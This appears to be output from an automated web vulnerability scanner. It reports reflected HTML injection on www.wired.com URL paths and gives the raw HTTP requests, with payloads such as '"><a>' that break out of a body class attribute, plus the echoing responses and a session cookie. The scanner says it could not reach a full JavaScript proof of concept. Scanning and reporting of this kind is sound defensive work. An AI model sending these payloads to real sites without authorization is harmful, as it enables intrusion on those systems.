Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:51 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets310b1"><a>8982e2d5c82 c_related">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2273e"><a>e3e8aa7828e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related2273e"><a>e3e8aa7828e/content/blogPost/reviews_25843 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29389
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:10 GMT
Date: Mon, 22 Nov 2010 01:11:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related2273e"><a>e3e8aa7828e">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a5"><a>295271ef989 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe10a5"><a>295271ef989/widgets/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:25 GMT
Date: Mon, 22 Nov 2010 01:10:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe10a5"><a>295271ef989 ss_widgets c_related">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dffe"><a>cc5a2c835a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets9dffe"><a>cc5a2c835a1/related/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets9dffe"><a>cc5a2c835a1 c_related">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f1"><a>6244b533a3a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatede38f1"><a>6244b533a3a/content/blogPost/threatlevel_20877 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:15:02 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatede38f1"><a>6244b533a3a">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ec0"><a>87032be8af7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax83ec0"><a>87032be8af7/widgets/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=230
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax83ec0"><a>87032be8af7 ss_widgets c_related">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfa0d"><a>6a79b0a2118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetsdfa0d"><a>6a79b0a2118/related/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:14:31 GMT
Date: Mon, 22 Nov 2010 01:10:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetsdfa0d"><a>6a79b0a2118 c_related">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced2f"><a>d31ee7a0ba1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedced2f"><a>d31ee7a0ba1/content/blogPost/threatlevel_20913 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:08 GMT
Date: Mon, 22 Nov 2010 01:11:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedced2f"><a>d31ee7a0ba1">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb42"><a>82cb0a5692c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxabb42"><a>82cb0a5692c/widgets/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=237
Expires: Mon, 22 Nov 2010 01:14:27 GMT
Date: Mon, 22 Nov 2010 01:10:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxabb42"><a>82cb0a5692c ss_widgets c_related">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b1b"><a>6f0f8c7e998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets97b1b"><a>6f0f8c7e998/related/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:41 GMT
Date: Mon, 22 Nov 2010 01:10:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets97b1b"><a>6f0f8c7e998 c_related">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606f"><a>222e926617f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedf606f"><a>222e926617f/content/blogPost/threatlevel_7588 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29392
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:15 GMT
Date: Mon, 22 Nov 2010 01:11:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relatedf606f"><a>222e926617f">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3862"><a>16338f02f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxe3862"><a>16338f02f90/widgets/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:06 GMT
Date: Mon, 22 Nov 2010 01:10:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajaxe3862"><a>16338f02f90 ss_widgets c_related">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9a4"><a>f176c1e030e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgetseb9a4"><a>f176c1e030e/related/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:14:45 GMT
Date: Mon, 22 Nov 2010 01:10:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgetseb9a4"><a>f176c1e030e c_related">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a940d"><a>ad6ce4969ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relateda940d"><a>ad6ce4969ca/content/blogPost/underwire_53528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogs37e36"><a>663daf42f79 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 22:29:37 GMT
Date: Sun, 21 Nov 2010 22:25:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogs37e36"><a>663daf42f79">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Sun, 21 Nov 2010 20:14:10 GMT
Date: Sun, 21 Nov 2010 20:10:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogsb7458"><a>0bc4e457d49">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars808a6"><a>226b4160ebe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars808a6"><a>226b4160ebe">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars847ce"><a>650bafdb219/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:15:22 GMT
Date: Sun, 21 Nov 2010 20:11:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars847ce"><a>650bafdb219">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
